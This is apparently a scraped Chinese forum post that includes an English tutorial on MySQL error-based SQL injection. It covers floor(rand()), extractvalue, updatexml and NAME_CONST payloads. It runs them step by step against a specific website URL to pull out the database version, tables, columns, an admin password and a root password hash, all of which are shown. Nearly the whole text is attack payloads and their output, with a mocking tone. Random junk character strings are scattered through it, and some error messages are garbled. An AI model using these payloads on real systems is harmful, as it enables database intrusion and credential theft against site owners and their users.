|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:9 N7 Q# Q& Q3 H9 s* H2 ^
首先进行正常查询: mysql> select * from article where id = 1;
5 S" o' S @7 o5 J" m+—-+——-+———+
9 \) Q- L3 I, f- {| id | title | content |
" E9 ]3 f6 [8 Y* b3 ]1 B5 J7 i" G+—-+——-+———+
! X; e$ z& @: b( V9 y/ i| 1 | test | do it |
4 f& _6 p' x) R$ l9 v+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
6 @6 t! Z# D4 i' fERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。' Q* Q$ ^* N6 _$ R
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
6 v! u3 A1 M! kERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));. K, ?8 k4 U3 y' Z
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
. |1 U, f6 v! C/ l2 q- q4 b9 r- t6 J测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–2 G& v* ?3 q( G) q, _
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
8 g8 \% ~0 U7 k, T" Q
- x: I# P4 S* A% K7 G再收集: & u# A9 R6 G3 c2 V4 S0 i' I3 z
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) / D" G9 b/ X4 {3 k
! P) {: ?& U* k7 T
Error uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’
1 h. I; a8 A" H; j7 t7 G& [0 Q$ x7 Q. a: l$ D. s; q
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c). C. y8 L: e6 g$ L
( \% [9 \* |$ ~/ q' H" k- O
Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 5 I( h0 u9 u, x. v+ p) P
9 g. g4 O/ O7 i- Q9 ~
MYSQL高版本报错注入技巧-利用NAME_CONST注入
, e! P# P: e$ i' O- uIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
0 c3 d% m5 V; i1 P
, I4 L1 @8 \0 \# j/ l( Q. |; J+ b
相关信息
3 _/ j4 h5 W, F% i9 R
! U/ p, x$ a1 Y' ] M1 R/ O- X( s0 fNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.4 l! c! } o" W
8 c0 d& J/ o( Q5 lCode:: v6 X& _9 t, ~" a& g6 ]
NAME_CONST(DATA, VALUE)
* N, O( w& R; O2 s
) l# S, w) g# t" ]( e1 M7 @Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants., r+ s. e1 g h$ @
$ S) t' y6 b% i0 C
SELECT NAME_CONST('TEST', 1)1 m9 z# v2 W+ A9 l d7 H
5 F$ }3 ~& X6 c( e, d3 f
3 e8 c6 v/ w; W6 s
# m5 [0 V- \# W5 L6 W& V6 q4 ||---------------|
; k) a4 L* ]9 F| TEST |& R6 o! e0 n) i5 T, i
| |# ^% _! i6 _' {; R7 V
|---------------|4 z9 ~8 F7 w3 ?* o: I$ T
| 1 |" m+ \$ ?4 ~' J: @7 t
| |& ^# _9 }- i6 Y
|---------------|
0 V+ ]+ i9 @. }. d4 w
; m5 L7 h/ c) w$ ~. N% l3 L F0 G3 S @
5 h9 ]- E9 S; i! L2 D3 h# m5 B6 ~
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
' H1 r6 I0 x6 a1 {. n# N# Q4 JIntro to MySQL Variables( g2 B2 `7 n; R$ d' R/ r, G( Y ~7 O
0 P! C; j6 e, |8 g' U0 x- Z/ iOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.( C. G' p5 C" a U& P
5 f& _ V1 I+ C2 B4 |0 i4 OCode:# m) T% W0 G% H3 F
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261( a* S0 D( R- K2 ?" m3 T9 @5 P3 `# a5 X8 t
& F/ P3 h: ?" L# B% e8 X
! C( {. }0 B( D/ l) W% t3 L- e8 {, r, F2 T; A* ~5 g, ~+ y6 d6 y
) F7 u# c6 C6 `
6 ], _6 s/ L/ l/ {
Code:
: S* w3 s+ p+ i) q) x0 tand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--) X' G- D: z7 l8 ?4 S0 u
: E1 B1 y6 \- ?" N; n/ E1 d$ E% l q l; d
VAR = Your MySQL variable.
' a- D* ?- c ]5 ]+ U1 _! @
l5 n4 k9 }2 |" eMySQL 5.1.3 Server System Variables
/ L$ N2 n4 |+ b2 e- v1 ]- Q+ l4 q, R7 a4 b5 V
Let's try it out on my site..
/ @ Z. B0 n+ m# i
/ S+ L0 L c! ~2 ^% n4 YCode:
8 S) E6 X. o3 G- I: v! ~http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- A1 C# Q( g1 y. ?1 j' J) c6 ]0 b% K
4 q% U1 j8 J+ sError uplicate column name '5.0.27-community-nt'/ n! H) b2 s& d& J/ |, }
1 e6 P% V7 W) D- B& e6 Q$ M: b6 j* h8 u/ i
! N v7 Z+ g9 S2 G
" x# D7 k# Z8 K7 U2 ]: ~
+ A, a2 H; W3 ]. BNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
2 m7 h$ B' u- T* N! ]* v
6 X9 F( J+ T3 G, A# W& k: g% |Data Extraction
3 `% l0 u' W' }; R O1 F \! q, O& f/ B X# Z
Code:
; L Y& ]: X6 X+ {+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--3 J2 S s( ?9 u V! D: d
; o* @. R5 W( K9 \; V1 `1 U- R. S0 |
We should get a duplicate column 1 error...+ S" v8 y. C C1 v
+ B/ U _ w( [# YCode:7 P) h! [+ v4 F& u* r
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
0 C5 a/ R9 `0 N2 C' J w
; a) ?- m% k1 e5 l& k# U8 ]) ~$ gError uplicate column name '12 D) M& ]. j, U
5 f! V) f1 X+ x& M0 P
$ A/ C% m7 s1 i7 O% e/ f" X$ _/ K& M# H
( l6 z% O# d4 L/ j
3 ]1 V9 T) _' H) f& ?8 d
}& o* V2 J& p$ D# | WNow let's get the tables out this bitch..( |: x- W2 A/ I3 i* U# q6 T
' i3 n+ v6 _" p: r3 H
Code:) [* I$ q( F( v; h# Z( |, w* x+ z
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--/ v ~& z8 O/ c1 p" c. u6 B/ u$ L
4 r% k# k8 }# }$ |
) G) P* l2 L9 F6 u+ ULet's see if it works here, if it does, we can go on and finish the job.% B3 m& L9 {( n9 V1 J! {5 D
, F7 Y: {9 b: R; K* D
Code:
! {% V( u* V& @5 @* ]! rhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
( |8 ^) u1 g/ g& |3 v( ]" t* ^) O: g Y A1 @7 N
; O, e& F, u5 @$ m: w4 n, Q- }
Error uplicate column name 'com_admanage
+ w; z! J; J7 Z( e7 c, x4 q7 _0 X+ x! r. E/ U
9 u8 s5 A9 Z$ e' J# i7 \
2 G% s* s# _* ]3 f4 D" u, T/ i I9 \% }& V' S! Z
" B2 N2 I9 B% ~: B, b+ O2 x
% ^4 N: Y( a( y5 JNow I'm going to be lazy and use mysql.user as an example, just for the sake of time." h2 D6 W& H! T
3 f) W4 H& x9 ~% K+ U! zLet's get the columns out of the user table..
' U# |3 c2 E3 {% A. F0 V8 m/ T
! z7 f( S% o: t/ G7 n8 D8 ECode:7 q5 g! V+ |+ G$ O1 r( l- w
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--7 r0 _, `9 E& `
+ F& E! f0 q3 {4 q2 p# |6 C+ Z
5 _7 B! n% W5 @9 j. ~So mine looks like this, and I get the duplicate column name 'Host'.
/ {) i+ a% z& Z, j2 j6 [1 k+ y
Code:
, \) ? D! `8 `2 a; |3 \7 hhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
6 p5 f5 _! I, q8 h
2 L0 n3 B( U& F5 sError uplicate column name 'Host'. a6 S$ y' P* J1 {5 U# V4 n
. X/ X, Q8 }; X. ]: k" l" I, e% k9 }2 d( R
, K {+ U3 p3 D7 E+ S
& Z% H- R3 K5 V4 q- l6 }
" V! ` R9 i O4 h2 o; E% s* L8 l, ~! w0 y# U2 f( Z- L
Woot, time to finish this bitch off.& a( ^2 U9 G w2 r1 g) M, @
( K: [* r9 X7 ^& L4 f$ Y4 O% d
Code:
) i8 ?8 S+ S5 |/ ~8 e+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--+ }' x" s8 @; [9 a5 E7 R
" y/ w( Q/ J. t n6 f1 B( ]0 l( V: F0 `3 X" ]2 @
So mine looks like this.... _) v+ ]! y& Q9 f) E, X
) b& \# f" }6 n7 K) ^( ]: f& C
Code:( J- T1 V s9 S3 {4 X
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--. a Z3 o' \+ N4 t) O, w
1 \: U7 h& {6 c4 |; KError uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'1 M0 X; ~2 M) U' B7 j( k& W
% Y0 h- a# x/ d/ V: o
) e7 f# f9 z% m: G V0 `3 z
8 i: B6 u6 p% ]# a3 H* j: `. _1 |. V$ y8 m5 f( E0 n: i2 c' ^
; k" q" e0 j& V( K. q% w
9 a! b3 g% P: u6 r4 O- ^. k, qAnd there we have it, thanks for reading.
3 P/ A7 {3 H+ ]1 E' j/ q6 {9 z4 V- z. }
& V8 T3 ?( x) E4 D T- c' O5 q7 n1 K |